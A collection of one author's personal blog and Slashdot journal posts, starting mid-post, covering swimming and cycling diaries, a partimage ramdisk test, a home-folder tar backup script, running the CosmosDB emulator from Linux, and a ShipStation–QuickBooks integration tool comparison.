$ sudo ./partimage -d -B x=y save /dev/ram0 ram0.img
Restore image to a different ramdisk and check file:
$ sudo ./partimage -B x=y restore /dev/ram1 ram0.img.000
$ sudo mount /dev/ram1 /media/ram1
$ cat /media/ram1/foo.txt
test file.
Mon Apr 9 12:56:59 BST 2007
Success!
Script for checking file in saved partition:
#!/bin/bash
# mount and check restored ramdisk
if [ ! -d /media/ram1 ]; then
mkdir /media/ram1
fi
mount /dev/ram1 /media/ram1
cat /media/ram1/foo.txt
umount /media/ram1
To debug in KDevelop as root (in ubuntu):
* alt-F2 (run)
* gksudo kdevelop
* open project... (go find existing copy)
So in summary, I have made progress in understanding the ways of this useful utility, and am a step closer to making a useful contribution to the project.
The rambling nature of this post reflects the way in which one begins to understand a new program. Hopefully it's not too hard to follow, or pick out the useful pieces. All feedback gratefully appreciated.
Tim.
<file_sep>---
title: "Yawn"
date: 2003-11-27
slashdot_url: https://slashdot.org/journal/53402/yawn
---
<p>Not getting enough sleep.<br>Too much stress.<br>Must learn<nobr> </nobr>/.NET<br>Failing to spend required hours.<br>Arrr, downhill spiral.<br>Think I'll make up for it with a shopping trip.<br>arr, the b3ta(.com) beast just disappeared 20mins of my life</p>
<file_sep>---
title: "Cycling"
date: 2004-03-08
slashdot_url: https://slashdot.org/journal/64581/cycling
---
<p>Went cycling with HG, Steve, Crash and Spud yesterday down in Dorking. Was super. Inlcuded in our tour a pub (of course), many miles of trail, and of note, a 30ft drop off which I probably wouldn't have done without the encouragement of the local beer (:</p>
<p>Am now suitably tired. Regretted taking tonight of swimming as was bored instead, still, got some coding done and had dinner for a change. Have made up mind to go to pool super early tomorrow and do as much as possible.</p>
<p>Currently trying to Learn XP Pro, C# for windows apps, ASP.NET, Linux stuff and a play all at once. Struggling a little, unsurprisingly. Work is about to get even busier for me I fear, if that's possible.</p>
<file_sep>---
title: "WhoIs Privacy"
date: 2003-12-04
slashdot_url: https://slashdot.org/journal/54070/whois-privacy
---
<p>Just came accross <a href="http://www.internetprivacyadvocate.org/ProtectYourPersonalInfo.htm"> this</a>. Network Solutions wants to end publicising who owns domain names. My response follow:</p>
<p>[x] I am not a Network Solutions customer<br>[x] The privacy of my personal data is important to me.<br>[ ] I support WHOIS rules that would limit online access to my personal information.<br>[ ] I offer strong support to proposals that promote personal privacy and rules that restrict providing my information to third-party organizations. This includes Network Solutions' proposal to the Internet Corporation for Assigned Names and Numbers (ICANN) to eliminate the Bulk WHOIS access obligation.</p>
<p>Comments<br>---------<br>I think it is important that such information remain publically available. If you don't like what people use it for then persue that line instead of trying to hide who you are. If enough people put effort into preventing abuse (ambiguous I know) of "the internet" then the problems of abuse will be diminished.</p>
<p>Pretending you don't exist will leave us all worse off, and make tracking down abuse harder.</p>
<p>------------<br>I think the second point is there just to achieve a good number so they can skew the meaning later.</p>
<file_sep>---
title: "Swimming"
date: 2004-01-13
slashdot_url: https://slashdot.org/journal/58121/swimming
---
<p>1km, I did it! 40 lengths. In 50 mins. Must've been the new trunks that did it, so much more comfortable, and so much less hastle, even if they are slightly embarrasing.<br>I did drive in mind. But I shall still be on my bike to work, just had to come back here in between to get the car picked up.</p>
<p>I am sooo tired. I've been "helping" the local drama bunch lately, so I was out till late last night again, then I had to go to Asda coz my cupboards were bear. Not without going to the pub first of course!</p>
<file_sep>---
title: Website builders for non-programmers
layout: post
---
Here's some tools that you can use if you're not a coder but want to put up a website.
I do custom coding, but sometimes non-technical folk ask me how to build a website, so here's a list of tools that allow you to create a site without having to know how to code.
- [webflow.com](https://webflow.com/)
- [Notion as a website builder](https://www.notion.so/help/guides/build-a-website-with-notion-in-seconds-no-coding-required)
- [bricksbuilder.io](https://bricksbuilder.io/)
- [brixbuilder.com](https://www.brixbuilder.com/)
- [squarespace.com](https://www.squarespace.com/)
- [wordpress.com](https://wordpress.com/)
- [Jekyll + github pages](/2019/06/24/setting-up-a-jekyll-blog/) if you're feeling a bit brave
Hope that's helpful, they aren't in any particular order of preference so try them out and see what works for you.
If you find others that should be on here then please drop me an email and I'll add any suggestions.
If you found this useful then go ahead and share with anyone else who you think might find this useful.
<file_sep>---
layout: page
title: Payment successful, thanks!
---
Any problems get in touch <<EMAIL>>
<file_sep>---
title: "Swimming"
date: 2004-01-08
slashdot_url: https://slashdot.org/journal/57574/swimming
---
<p>24 lengths today, but in a slightly dismal 40 minutes.</p>
<p>Still I am getting better. Did much more front crawl today (still mostly half lengths) but did swallow/breath a fairly significant amount of chlorinated water.</p>
<p>From the 3 lengths I managed on the 2nd Dec 03, in an hour. That's much better.</p>
<p>I've been : Tue & Thur 2,4,9,11,16,18,23rd Dec, Sat 3rd Jan, Tue & Thur 6, 8th Jan.<br>That's.... 10 times! Yay.</p>
<file_sep>---
title: "Also - music"
date: 2003-12-12
slashdot_url: https://slashdot.org/journal/54880/also---music
---
<p>I wrote a song to be played by <a href="http://www.sr.se/cgi-bin/p1/src/sing/default.asp"></a><br>this singing thing<br><i><br>be happy, don't worry.<br>feel glad, it's not that bad<br>the sun shines,<br>our friends are close to us</i></p>
<p><i>all the fear is far away<br>so be happy and be gay</i></p>
<file_sep>---
layout: post
title: Get emailed Tim's blog and photos
date: '2007-05-27T17:35:00.000Z'
author: <NAME>
tags:
modified_time: '2007-05-27T17:50:34.011Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-5421384601534929039
blogger_orig_url: https://timwise.blogspot.com/2007/05/get-emailed-tims-blog-and-photos.html
---
Can't be bothered to check here and see if I've written anything this month? Great news! You can now have my blog entries and latest flickr photos sent to you by email thanks to the feedblitz service.
You can subscribe to my blog using the email box on the bottom of the right hand menu, or by clicking [here](http://www.feedblitz.com/f/?Sub=216154).
You can subscribe to my flickr photo feed [here](http://www.feedblitz.com/f/?Sub=216268) (public photos only - you have to be my flickr contact to see photos of friends I post).
<file_sep>---
title: "Get with the (music) program - podsafe radio"
date: 2006-04-28
slashdot_url: https://slashdot.org/journal/134479/get-with-the-music-program---podsafe-radio
---
<p>I've been looking for a show to listen to for some time that has some decent music in it. Finally I've found one:<br>The podshow music rewind: <a href="http://rewind.podshow.com/">http://rewind.podshow.com/</a><br>Check it out. This guy plays clips from all the podshows, showcasing the best new music from the podsafe music network.</p>
<p>I came across it thanks to <NAME> <a href="http://curry.com/">http://curry.com/</a></p>
<p>Fyi: you can subscribe with:<br>iTunes (easy)<br>Juice (desiigned for the job) <a href="http://juicereceiver.sourceforge.net/index.php">http://juicereceiver.sourceforge.net/index.php</a><br>or bashpodder (quick & effective linux script) <a href="http://linc.homeunix.org:8080/scripts/bashpodder/">http://linc.homeunix.org:8080/scripts/bashpodder/</a> - my favourite<br>there's many more of course.</p>
<file_sep>---
title: "how to destroy the earth"
date: 2005-06-03
slashdot_url: https://slashdot.org/journal/108484/how-to-destroy-the-earth
---
<p>settle in. it's a long read...<br><a href="http://ned.ucam.org/~sdh31/misc/destroy.html">http://ned.ucam.org/~sdh31/misc/destroy.html</a></p>
<p>link courtesy of the b3ta newsletter</p>
<file_sep>---
title: Running the CosmosDB emulator on Linux
layout: post
---
Update: microsoft have released a linux compatible docker image it seems, let me know if it actually works and I'll update this post. <https://docs.microsoft.com/en-us/azure/cosmos-db/linux-emulator>
----
Unfortunately even though "Microsoft 🖤 Linux" the CosmosDB team seem less keen. This is not fun, pretty or stable, but at least it works which is something.
There is a docker image but it only runs on docker-for-windows so it's no help here.
## Overview
1. Grab a Windows VM, install the emulator.
2. Copy the emulator SSL cert to the host.
3. Map the ports.
4. Redirect the VM IP back to localhost with iptables.
## Steps
### Get a Windows VirtualBox VM Running
Download the VirtualBox image from <https://developer.microsoft.com/en-us/windows/downloads/virtual-machines/> (2 month free trial, no key needed).
Install VirtualBox.
Fix the VM image configuration (if you are using the slightly older VirtualBox from ubuntu's apt repositories) by removing `controller="VBoxSVGA"` from the `.ovf` file in the `.ova` file (which is a tar.gz archive). See <https://schnouki.net/post/2020/how-to-run-a-win10-dev-vm-on-virtualbox-5/> for details.
Import the VM into VirtualBox
Run the VM
Install the guest additions (Devices > Insert guest additions CD)
Set the timezone (VM defaults to US).
Turn on seamless copy-paste & drag-and-drop (so that we can move certificate and data files to/from the host easily).
### Set up the CosmosDB emulator
In the Windows VM download and install the CosmosDB emulator in the VM from <https://docs.microsoft.com/en-us/azure/cosmos-db/local-emulator?tabs=ssl-netstd21#installation>
If the emulator is already running, shut it down:
```powershell
cd "C:\Program Files\Azure Cosmos DB Emulator"
.\Microsoft.Azure.Cosmos.Emulator.exe /shutdown
```
Start the emulator with network access enabled.
```powershell
cd "C:\Program Files\Azure Cosmos DB Emulator"
.\Microsoft.Azure.Cosmos.Emulator.exe /AllowNetworkAccess /DisableRateLimiting /Key='<KEY>
```
(This key is the hard-coded well-known key that the emulator uses by default, which makes it easy to connect the storage explorer).
Check it is listening on `0.0.0.0:8081` (as opposed to `127.0.0.1:8081`):
```
netstat -a |findstr 8081
```
### Map the CosmosDB port to the host
In the VirtualBox network settings for the VM, click advanced and add a port mapping for 8081 on the VM to 8081 on the host.
See <https://www.howtogeek.com/122641/how-to-forward-ports-to-a-virtual-machine-and-use-it-as-a-server/>
This makes the emulator appear as if it was running on the Linux host.
(Note there are replica ports that need mapping too, see the dotnet-core section below).
### Connect with Storage Explorer
Install the Azure Storage Explorer on your Linux host, either with the .tar.gz or from the snap store
<https://azure.microsoft.com/en-us/features/storage-explorer/>
Run the storage explorer.
Connect to the emulator on localhost.
You should now be able to create collections and add documents, and then view them.
### Connecting from dotnet-core
Problems connecting from core that I didn't encounter with storage explorer:
1. The SSL certificate is rejected.
2. CosmosDB sets the [`ReadEndpoint`](https://docs.microsoft.com/en-us/dotnet/api/microsoft.azure.documents.client.documentclient.readendpoint) to be the VM's IP address, which isn't accessible from the host because we are using NAT and port mapping. (oddly this wasn't consistently the interal IP address.
3. The replicas listen on additional ports which also need mapping.
#### Accepting the emulator SSL certificate
This is the error you get trying to connect to the CosmosDB emulator from dotnet core on Linux without adding the certificate to the Linux host's certificate authority (CA) list:
```
System.Net.Http.HttpRequestException:
The SSL connection could not be established,
see inner exception. ---> System.Security.Authentication.AuthenticationException:
The remote certificate is invalid according to the validation procedure.
at at System.Net.Security.SslStream.StartSendAuthResetSignal(
ProtocolToken message, AsyncProtocolRequest asyncRequest, ExceptionDispatchInfo exception)
```
Export the emulator's public SSL certificate "DocumentDbEmulatorCertificate" as base64 X509.
Reference: <https://docs.microsoft.com/en-us/azure/cosmos-db/local-emulator-export-ssl-certificates#how-to-export-the-azure-cosmos-db-tlsssl-certificate>
Copy the exported file to your Linux host.
Add the certificate to the trusted certificates on your machine (these instructions are for Ubuntu/Mint):
```
sudo cp --verbose cosmos-emulator.cer /usr/local/share/ca-certificates/cosmos-emulator.crt
sudo update-ca-certificates --verbose
```
Reference: <https://stackoverflow.com/questions/44159793/trusted-root-certificates-in-dotnet-core-on-linux-rhel-7-1/44160125#44160125>
Note the change in file extension from `.cer` to `.crt` between export and import (I'm not 100% sure if this matters).
*Note that the certificate is regenerated on emulator startup* so you'll either have to do this every time or pass the emulator a predefined certificate to use.
If you want to validate the certificate has been installed, see <https://unix.stackexchange.com/questions/97244/list-all-available-ssl-ca-certificates>
#### Redirecting ReadEndpoint traffic
In the VM in a powershell or command prompt run `ipconfig` to get the machine's IP address.
Tell `iptables` to redirect all requests for the VM's IP address back to `localhost`:
```bash
sudo iptables -t nat -I OUTPUT --dst 10.0.2.XXX -p tcp --dport 8081 -j REDIRECT --to-ports 8081
```
Where `XXX` is the IP of your VM.
As per: <https://unix.stackexchange.com/questions/441182/how-to-map-an-ip-address-to-localhost>
#### Mapping replica port(s)
On the VM run `netstat -a |findstr LISTENING`
You'll see a bunch of ports in the 10,000-20,000 range. These are the replicas
I found out which ports to map by running the client code and looking at the exception when it failed to connect. It was only port `10253` for me so far. Here's the error for a failure:
```
Microsoft.Azure.Documents.ServiceUnavailableException: Service is currently unavailable.
ActivityId: 2dfaf5dc-0d5a-4ed7-828d-c16cdcd117a3,
RequestStartTime: 2020-09-17T20:00:16.8868999Z, RequestEndTime: 2020-09-17T20:00:46.7777188Z, Number of regions attempted: 1
ResponseTime: 2020-09-17T20:00:16.9400284Z, StoreResult: StorePhysicalAddress: rntbd://10.0.2.15:10253/apps/DocDbApp/services/DocDbServer15/partitions/a4cb495b-38c8-11e6-8106-8cdcd42c33be/replicas/1p/, LSN: -1, GlobalCommittedLsn: -1, PartitionKeyRangeId: , IsValid: False, StatusCode: 410, SubStatusCode: 0, RequestCharge: 0, ItemLSN: -1, SessionToken: , UsingLocalLSN: True, TransportException: A client transport error occurred: Failed to connect to the remote endpoint. (Time: 2020-09-17T20:00:16.9221735Z, activity ID: 2dfaf5dc-0d5a-4ed7-828d-c16cdcd117a3, error code: ConnectFailed [0x0005], base error: socket error ConnectionRefused [0x0000274D], URI: rntbd://10.0.2.15:10253/, connection: <not connected> -> rntbd://10.0.2.15:10253/, payload sent: False, CPU history: not available, CPU count: 8), ResourceType: Document, OperationType: Query
```
Add these ports to the VirtualBox port mapping configuration for your VM.
In the VM in a powershell or command prompt run `ipconfig` to get the machine's IP address.
Tell `iptables` to redirect all requests for the VM's IP address back to `localhost`:
```bash
sudo iptables -t nat -I OUTPUT --dst 10.0.2.XXX -p tcp --dport 10253 -j REDIRECT --to-ports 10253
```
Where `XXX` is the IP of your VM and `10253` is the replica port.
As per: <https://unix.stackexchange.com/questions/441182/how-to-map-an-ip-address-to-localhost>
## Importing data
If you need to import data then use data migration tool from <https://docs.microsoft.com/en-us/azure/cosmos-db/import-data#Install>
## Success
With all of the above I was then able to connect a dotnet-core application on Linux to a CosmosDB emulator.
## Emulator failures
After a while and some unrecorded fiddling, the emulator then gave up the ghost, resulting in the Azure Storage Explorer reporting the apparently meaningless error message "Unable to retrieve child resources."
According to the internet this error could mean anything. <https://social.technet.microsoft.com/wiki/contents/articles/53393.azure-storage-explorer-troubleshooting-unable-to-retrieve-child-resources-or-the-request-action-could-not-be-completed.aspx>
I might just blow the whole VM away and start again...
## Should you use CosmosDB?
CosmosDB comes with significantly increased costs:
* I gather it's very expensive to run in production
* Development is painful
As a result you should only choose CosmosDB for your solution if you *really* need something it offers that you can't get from a more straight-forward SQL or DocumentDB solution and your domain is a good match for the document-database (aka NoSQL) model.
## Further reading
* [Azure Development using CosmosDB offline Emulator by <NAME>](https://medium.com/faun/comosdb-offline-emulator-78559ae91cd1)
<file_sep>---
title: "google funds open source development"
date: 2005-06-02
slashdot_url: https://slashdot.org/journal/108390/google-funds-open-source-development
---
<p>This is a welcome boost for open source.<br>Shame i'm no longer a student.</p>
<p>-------- Original Message --------<br>Subject: Google sponsors Nmap summer student developers<br>Date: Thu, 2 Jun 2005 02:56:52 -0700<br>From: Fyodor <br>To: <EMAIL></p>
<p>Hello everyone,</p>
<p>Yesterday, Google announced their first Summer of Code program. This<br>innovative and generous program provides $4,500 stipends to each of<br>200 university students to create or enhance open source software<br>during their summer break. I am pleased to announce that Nmap is one<br>of 40 open source projects that Google selected for this program. We<br>would be pleased to work with one or more students to extend the power<br>of Nmap. You get paid, gain valuable experience and a great resume<br>booster, while the Nmap project and users benefit from your valuable<br>contributions.</p>
<p>You have until June 14 to apply if you are interested, though your<br>chances may be better if you apply sooner. If you do fill out the<br>application, please also send me the project description and a brief<br>bio describing how your experience fits the project. Also let me know<br>what school you attend. I have written up some project ideas, though<br>you are free to submit whatever cool idea your heart desires.</p>
<p>Here are the relevant URLs:</p>
<p>Nmap Project Ideas: <a href="http://www.insecure.org/nmap/GoogleGrants.html">http://www.insecure.org/nmap/GoogleGrants.html</a><br>Google's Summer of Code Page: <a href="http://code.google.com/summerofcode.html">http://code.google.com/summerofcode.html</a><br>Participant FAQ: <a href="http://code.google.com/summfaq.html">http://code.google.com/summfaq.html</a><br>Application Form: <a href="http://code.google.com/soc_application.html">http://code.google.com/soc_application.html</a></p>
<p>Good luck!<br>-Fyodor</p>
<p>_______________________________________________<br>Sent through the nmap-hackers mailing list<br>http://cgi.insecure.org/mailman/listinfo/nmap-hackers</p>
<file_sep>---
layout: post
title: backing up your home folder
date: '2007-06-20T20:59:00.000Z'
author: <NAME>
tags:
- backup
- ubuntu
- linux
- script
modified_time: '2007-06-20T23:10:18.919Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-1206082451587115261
blogger_orig_url: https://timwise.blogspot.com/2007/06/backing-up-your-home-folder.html
---
Here I outline the solution I chose for backing up my life, er... I mean home folder. (I'm sure there's life outside /home/tim somewhere...)
My requirements were:
* backup to dvd+rw
* \>20GB of data to back up
* no obscure formats (in case I don't have the backup tool when I need to restore)
I looked at several solutions for backups but ended up writing scripts to meet my needs.
The main script creates a tar file of my home directory, excluding certain items, which is then split into files suitable for writing to dvd+rw discs, with tar based verification, md5sums and file list text files created at the same time.
The reason for splitting to 3 files per disc is that the [iso 9660](http://en.wikipedia.org/wiki/ISO_9660#The_2_GiB_.28or_4.2GB_depending_on_implementation.29_file_size_limit) spec has a 2GB file size limit, and it's important that the discs are as simple as possible (ie no UDF) to aid recovery in awkward situations. This is also why I avoided compression.
backup_home.sh
#!/bin/bash -v
#DVD+R SL capacity 4,700,372,992 bytes DVD, (see [wikipedia on DVD](http://en.wikipedia.org/wiki/DVD))
#ISO max file size 2GB. 4.38GB/3 = 1,566,790,997bytes = 1,494MB
#1,490MB to leave some space for listings and checksums
tar -cvv --directory /home tim --exclude-from backup_home_exclude.txt | split -b 1490m - /var/backups/tim/home/home.tar.split.
cd /var/backups/tim/home
md5sum home.tar.split.* > home.md5
cat home.tar.split.* | tar -t > home_file_list.txt
cat home.tar.split.* | tar -d --directory /home tim > home_diff.txt
ls -l home.* > home_backup_files.txt
backup_home_exclude.txt
tim/work*
tim/.Trash*
tim/.thumbnails*
This leaves me with a big pile of split files (named .aa, .ab etc) and a few text files. I proceeded to write 3 split files per disc, and put the 4 text files on every disc for convenience. I used gnome's built in DVD writing to create the discs.
I also wanted to verify the md5 checksums as the discs were created, so I wrote another little script to make life easier. This ensures the newley written disc has been remounted properly, and runs the md5 check. So long as the 3 relevant checksums came out correctly on each disc I can be reasonably confident of recovering the data should I need it.
"eject -t" closes the cdrom, which is handy.
reload_and_verify.sh
#!/bin/bash -v
cd /media
eject
eject -t
mount /media/cdrom
cd cdrom
md5sum -c home.md5
cd /media
eject
In addition to the above mechanism (which is a pain at best, mostly due to media limitations) I keep my machines in sync with [unison](http://www.cis.upenn.edu/~bcpierce/unison/) which I strongly recommend for both technical and non-technical users. I gather it also runs on microsoft (who?), so you might find it useful if you are mid transition.
<file_sep>---
layout: post
title: Running IE Application Compatibility VPC under Virtual Box
date: '2012-04-18T21:59:00.005Z'
author: <NAME>
tags:
- virtualbox
- workaround
- vpc
- windows
- linux
modified_time: '2013-09-09T19:58:02.140Z'
thumbnail: http://2.bp.blogspot.com/-6nGRU7FIXbw/T487RpEWm5I/AAAAAAAAAE0/TPYAZzmUYy8/s72-c/sata-controller.png
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-1232309832274484466
blogger_orig_url: https://timwise.blogspot.com/2012/04/running-ie-application-compatibility.html
---
This post is no longer necessary as microsoft now provide official virtualbox
images, yay!
[http://www.modern.ie/en-us/virtualization-tools#downloads](http://www.modern.ie/en-us/virtualization-tools#downloads)
----
Microsoft provide Virtual PC images for testing your website with IE. You can
download them from
[http://www.microsoft.com/download/en/details.aspx?id=11575](http://www.microsoft.com/download/en/details.aspx?id=11575)
Note that the XP image has no expired so is no use, it will reboot immediately
after login.
I wanted to make use of the Win 7 / IE 9 image, however Virtual PC is
unavailable on Linux. Fortunately VirtualBox can mount Virtual PC's disk
images.
For me the image would get half way through booting windows, and then
blue-screen (BSOD). I discovered that it was possible to get past this by
removing the SATA controller the machine's settings, and instead adding the
disk under the IDE controller. After that the machine booted successfully.

* * *
Capturing the BSOD, basically press F8 after a lot rebooting, and select
"disable automatic restart on system failure" (ref:
[http://www.webtlk.com/2009/07/02/how-to-stop-windows-7-reboot-loop/](http://www.webtlk.com/2009/07/02/how-to-stop-windows-7-reboot-loop/))


<file_sep>---
layout: post
title: MCTS in ASP.NET 3.5 - Mission accomplished.
date: '2009-12-18T09:59:00.005Z'
author: <NAME>
tags:
- mcts
- certification
- microsoft
modified_time: '2009-12-18T10:06:50.213Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-2991052489429405502
blogger_orig_url: https://timwise.blogspot.com/2009/12/mcts-in-aspnet-35-mission-accomplished.html
---

I am now a *Microsoft Certified Technology Specialist in .NET Framework 3.5, ASP.NET Applications*, which is nice.
<file_sep>---
title: "beer, linux & aaar."
date: 2004-03-24
slashdot_url: https://slashdot.org/journal/66222/beer-linux-aaar
---
<p>Was going to write yesterday but things have been on code "aaaaaarrr" lately due to absence of J.</p>
<p>Exercise this week: nil (apart from commutating)<br>Beer this week: (b)(b)(b)(b)(b)(b)(b)(b)(b)</p>
<p>I was going to say that I'd nearly succeeded in booting a computer into linux from a usb key memory device, using <a href="http://rz-obrian.rz.uni-karlsruhe.de/knoppix-usb/">this</a> reference. And damn small linux as stated, which I already knew about.</p>
<p>Struggling to recompile the kernel image on my SuSE 9 box.<br>Why do it? Because I should be able to. And it's satisfying. Who needs sleep anyway?</p>
<file_sep>---
title: "Swimming"
date: 2003-12-19
slashdot_url: https://slashdot.org/journal/55743/swimming
---
<p>Didn't remember to write entry on Thur as had manic morning at work (what's new?) then xmas drinks in the afternoon (and we won't talk about the evening other than saying I regret it... urrrgh).<br>In other news, I made it into the pool in time for 35 mins swimming and managed 22 lengths I think. Including two not very successful attempts at a front crawl / breathing water.</p>
<p>Irrelevantly: I just got vnc viewer working on my P800 and can actually see these words in this form on it. Woo! Cool, but not useful (sorry Negi).</p>
<file_sep>---
layout: post
title: GpsPrune file matching
date: '2011-11-09T00:08:00.001Z'
author: <NAME>
tags:
- gps
- gpx
- gpsprune
- oss
modified_time: '2011-11-09T00:11:55.633Z'
thumbnail: http://farm7.static.flickr.com/6215/6327537524_63e500602c_t.jpg
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-2383499498516356796
blogger_orig_url: https://timwise.blogspot.com/2011/11/gpsprune-file-matching.html
---
[](http://www.flickr.com/photos/tim_abell/6327537524)
I wanted to be able to load a whole bunch of gpx traces and see which one was where on the map. I've got a basic version working thought it's a bit rough around the edges.
The code is available for you to grab from [http://github.com/timabell/gpsprune](http://github.com/timabell/gpsprune)
And above is a pic of it in action, having opened a load of files at once and clicked on one of them in the list
<file_sep>---
title: "post-relational databases in the real world"
date: 2005-07-20
slashdot_url: https://slashdot.org/journal/112339/post-relational-databases-in-the-real-world
---
<p>A Simpler Way of Getting<nobr> </nobr>.NET Objects out of ADO.NET<br>By <NAME><br><a href="http://www.15seconds.com/Issue/031013.htm">http://www.15seconds.com/Issue/031013.htm</a></p>
<p>A very informative article on the practical isssues and advantages of using a real object database (Matisse) versus the de-facto relational + object mapping solutions.</p>
<file_sep>---
layout: post
title: My mum and her super ceramics
date: '2007-05-28T02:18:00.001Z'
author: <NAME>
tags:
- ceramics
- mum
modified_time: '2007-05-28T02:22:00.450Z'
thumbnail: http://farm1.static.flickr.com/252/516198134_4f3854a2d4_t.jpg
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-5927976670841268452
blogger_orig_url: https://timwise.blogspot.com/2007/05/my-mum-and-her-super-ceramics.html
---
My mum has started posting [pics of her fab ceramics work on
flickr](https://www.flickr.com/photos/sarah_abell/). Go mum!
One of her early pieces has pride of place in my display cabinet and is admired
by all. Watch this space for more funky designs as she heads towards the end of
uni.
<file_sep>---
title: "yacht"
date: 2005-07-27
slashdot_url: https://slashdot.org/journal/112954/yacht
---
<p>Me on a boat with work people earlier this month. Hurrah.</p>
<p><a href="http://www.no2.co.uk/gallery/view_album.php?set_albumName=eMapSite-com-Sailing-Weekend-10th-July-2005&page=1">http://www.no2.co.uk/gallery/view_album.php?set_albumName=eMapSite-com-Sailing-Weekend-10th-July-2005&page=1</a></p>
<file_sep>---
layout: post
title: Reliable javascript checkbox events
date: '2011-05-18T22:30:00.004Z'
author: <NAME>
tags:
- dhtml
- javascript
- html
- jQuery
- web
modified_time: '2011-05-18T23:24:56.428Z'
thumbnail: http://farm4.static.flickr.com/3652/5734606641_c61a818d47_t.jpg
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-7525465672135952518
blogger_orig_url: https://timwise.blogspot.com/2011/05/reliable-javascript-checkbox-events.html
---
[](http://www.flickr.com/photos/tim_abell/5734606641/)
Some sites have checkboxes which show/hide another element when you click them. This a handy feature, but not all sites take into account the fact that firefox remembers the contents of a form when you reload the page (this is a good thing).
So here's how you avoid that with jQuery:
<script type="text/javascript">
$(function() {
// initialise show/hide to match the checkbox value
$('.targetelements').toggle($('#mycheckbox').attr('checked'));
// attach click handler for show/hide to checkbox
$('#mycheckbox').click(function(){ $('.targetelements').toggle(this.checked);})
});
</script>
Simples!
You could use the same principle without jQuery if you need to. Simply read the value of the checkbox with javascript the old fashioned way before deciding whether to hide when you initialise you page.
<file_sep>---
title: "Bonjour"
date: 2004-08-16
slashdot_url: https://slashdot.org/journal/80470/bonjour
---
<p>Today, I have mostly been riding a <a href="http://www.santacruzmtb.com/bicycles/vpfree.php">vp free</a>, down mountains. Most excellent. Some rain, some sun, lots of stunning <a href="http://www.timwise.co.uk/images/IMG_3894.JPG">scenery</a>.</p>
<file_sep>---
title: "Swimming"
date: 2004-01-20
slashdot_url: https://slashdot.org/journal/58974/swimming
---
<p>26 lengths today, 45 mins. Then a bacon sarny in the local caf.</p>
<file_sep>---
title: Integrating ShipStation with QuickBooks Desktop
layout: post
---
A possible customer of my [new eCommerce Integration
business](https://ecommerceintegrations.co.uk/) popped up with an interesting
problem: how to have orders that are entered into [QuickBooks
Desktop](https://quickbooks.intuit.com/desktop/) automatically create matching
entries in [ShipStation](https://www.shipstation.com/).
> "How can I get my orders from QuickBooks into ShipStation without my staff manually retyping them?"
## What is ShipStation?
It is a one-stop order shipping interface for shipping your physical outbound
orders that can in turn talk to all the actual couriers so you don't need to
deal with them individually. It connects to Royal Mail, Hermes, DPD etc.
## Connecting ShipStation to QuickBooks Desktop
There isn't a direct way of connecting them together, so that means we need
something to do the work of pulling orders out of QuickBooks and pushing them
into ShipStation.
Here's two pieces of software that can connect the two systems together:
## Connex
* <https://www.shipstation.com/partners/connex-quickbooks/>
* <https://www.syncwithconnex.com/>
* Connex is a bit like Codeless BPA in that it enables a flow of orders, but specific to QuickBooks rather than having many connectors on both sides.
* This page lists exactly what pieces of data will be transferred: <https://help.syncwithconnex.com/hc/getting-started-with-shipstation>
* [ShipStation help page on Connex for QuickBooks](https://help.shipstation.com/hc/en-us/articles/360026142191#UUID-b13db029-1f01-b9b8-52f3-71e0c4caa0be)
* The [base price for Connex is $199/month](https://www.syncwithconnex.com/products-2/) at time of writing.
## Codeless BPA
* <https://www.codelessplatforms.com/business-process-automation-platform/>
* Codeless has a [ShipStation connector](https://www.codelessplatforms.com/connectors/shipstation-integration/)
* BPA Platform starts from £175/month billed annually.
* We'd need to do some investigation of the method of integrating QuickBooks Desktop with Codeless BPA.
## Connex versus Codeless
Both Codeless BPA and Connex have similar monthly costs, and both will need
setting up, so choosing which to go with is going to come down to which option
fits your businesses needs better now and in the longer term. Connex will solve
the immediate problem, but Codeless has more connections you can use in the
future.
## DBSync
* <https://www.mydbsync.com/workflow/shipstation-quickbooks-integration>
* Cloud and On-Premise offerings.
* "Chat for pricing"
## Unify by Webgility
* ShipStation integration: <https://www.webgility.com/integrations/shipstation>
* QuickBooks desktop integration: <https://www.webgility.com/integrations/quickbooks>
* [From $39/month billed annually](https://www.webgility.com/pricing) at time of writing.
* [ShipStation integration help page](https://help.shipstation.com/hc/en-us/articles/360025856492-Unify-by-Webgility?queryID=2ab3382fc895786ba9cda0cfbc556a5b).
## Automate.io
* <https://automate.io/integration/quickbooks/shipstation>
* [From free to $159/month](https://automate.io/pricing)
## TradeGecko (retired)
* This is [being retired](https://www.tradegecko.com/sunset), but mentioned for completeness.
* <https://support.tradegecko.com/hc/en-us/articles/201825933-ShipStation-Integration-Setup-Guide>
## To integrate now, or to change technology?
As everything moves to the cloud it's worth considering whether to invest
further in your existing desktop-based technology choices, or to take the
opportunity to move to cloud based accounting and ERP systems before looking to
connect them together.
## Get in touch
Did I miss an option? Let me know!
Can I help you or someone you know with something? Reach out!
<file_sep>---
layout: post
title: Home server docker-compose
date: 2017-08-29 21:26:28.000000000 +01:00
type: post
parent_id: '0'
published: true
password: ''
status: publish
categories: []
tags: []
author:
login: timabell
email: <EMAIL>
display_name: timabell
first_name: ''
last_name: ''
permalink: "/2017/08/29/home-server-docker-compose/"
---
Another step in making a throw-away home server: docker-compose.
Find my compose file and setup script at <https://github.com/timabell/home-server-docker-compose>
I learned how to use docker-compose while working on reverse-proxying sdv, find out more: <https://github.com/timabell/sdv-docker>
<file_sep>---
layout: post
title: stop motion animation on linux
date: '2008-03-27T21:29:00.007Z'
author: <NAME>
tags:
- photography
- howto
- animation
- linux
modified_time: '2011-04-24T07:58:44.332Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-4371985220813850741
blogger_orig_url: https://timwise.blogspot.com/2008/03/stop-motion-animation-on-linux.html
---
A quick howto...
1. Take a series of photos on your digital camera.
2. Copy them onto your linux box.
3. shrink the photos to a more managable size:
`mogrify -verbose -resize 600x400 -quality 60% *.JPG`
4. Preview the animation with animate:
`animate -delay 8 *`
5. Optionally rotate the image to match the exif information from your camera (mine was sideways):
`exiftran -ai *`
6. Convert the jpg files to png:
mogrify -format png *.JPG
7. Create the flash animation from the PNG files:
`png2swf -r 15 -o flower2.swf -v -X 399 -Y 600 *.png`
